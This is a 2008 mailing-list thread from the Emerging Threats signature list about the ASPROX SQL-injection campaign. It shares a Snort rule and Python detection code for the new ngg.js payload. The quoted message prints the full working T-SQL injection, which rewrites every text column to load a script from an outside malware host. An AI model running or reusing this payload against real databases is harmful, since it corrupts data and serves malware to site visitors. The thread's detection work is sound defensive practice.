[Emerging-Sigs] Another ASPROX Snort rule
Matt Jonkman
jonkman at jonkmans.com
Mon Jul 7 12:30:04 EDT 2008
Thanks Greg. I think this url is safer to sig than the old /b.js.
Posting your sig now.
Matt
Greg Martin wrote:
> ASPROX payload morphed
>
> New domains found and new javascript payload "ngg.js" replaced the
> previous "b.js" starting just a couple of days ago. And it doesn't
> seem to be wasting any time:
> http://www.google.com/search?q=ngg.js Results 1 - 10 of about
> 19,300 for ngg.js. (0.03 seconds)
>
> DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR
> FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE
> a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231
> OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO
> @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C
> +']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''script src=http://www.apidad.com/ngg.js
> /script''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE
> Table_Cursor DEALLOCATE Table_Cursor
>
> Snort signature to detect access of infected site:
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ASPROX
> Infected Site - ngg.js Request"; flow:established,to_server;
> uricontent:"/ngg.js"; classtype:trojan-activity;
> reference:url,infosec20.blogspot.com/; rev:1; sid:4000002;)
>
> -G
>
> Greg Martin
> Director InfoSecurity
> Econet Inc. - Sentinel IPS
> 972.991.5005 x102
> http://infosec20.blogspot.com
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc
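As an added example (not code from this thread or from Emerging Threats), here is the defender's side of the rule and payload quoted above in Python: one check scans proxy log lines for requests to the payload filenames the Snort rule looks for, the other scans dumped text-column values for the script tag the UPDATE appends. It assumes the appended string is an ordinary HTML `<script src=...></script>` tag (the quoted mail lost its angle brackets); the log format, hostnames and table rows are constructed.

```python
import re

# Constructed proxy log lines for this example (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 "GET http://www.example.com/index.html HTTP/1.1" 200
10.0.0.5 "GET http://www.apidad.com/ngg.js HTTP/1.1" 200
10.0.0.7 "GET http://cdn.example.net/jquery.js HTTP/1.1" 200
10.0.0.9 "GET http://www.example.org/js/ngg.js?v=2 HTTP/1.1" 404
10.0.0.9 "GET http://www.example.org/shopping.jsp HTTP/1.1" 200
"""

REQUEST_RE = re.compile(r'^(\S+) "GET (\S+) HTTP/1\.[01]" (\d{3})')

def find_payload_requests(log_text, filenames=("ngg.js", "b.js")):
    """Return (client, url) pairs whose path ends in an ASPROX payload
    filename. uricontent:"/ngg.js" in the Snort rule is a substring match;
    checking the final path segment is stricter and skips e.g. /shopping.jsp."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, url, _status = m.groups()
        path = url.split("?", 1)[0]              # drop the query string
        if path.rsplit("/", 1)[-1] in filenames:
            hits.append((client, url))
    return hits

# Tag appended by the UPDATE statement: RTRIM(value) + '<script src=...></script>'.
# Assumed form; the quoted mail shows it without angle brackets.
INJECTED_RE = re.compile(
    r'<script\s+src=["\']?https?://[^\s>"\']+\.js["\']?\s*>\s*</script>\s*$',
    re.IGNORECASE)

def find_injected_rows(rows):
    """rows: (table, column, key, value) dumped from the column types the
    payload targets (xtype 99/35/231/167 = ntext/text/nvarchar/varchar).
    Returns (table, column, key) for values ending in an injected tag."""
    return [(t, c, k) for t, c, k, v in rows
            if isinstance(v, str) and INJECTED_RE.search(v)]

# Constructed sample rows; row 7 carries a legitimate relative script tag.
SAMPLE_ROWS = [
    ("Products", "Description", 1, "Blue widget"),
    ("Products", "Description", 2,
     "Red widget<script src=http://www.apidad.com/ngg.js></script>"),
    ("News", "Body", 7, "Site news<script src=/local/app.js></script>"),
]
```

Both functions return their findings so they can feed a ticket or a cleanup script; a hit from the second check is the list of rows whose values need the trailing tag stripped.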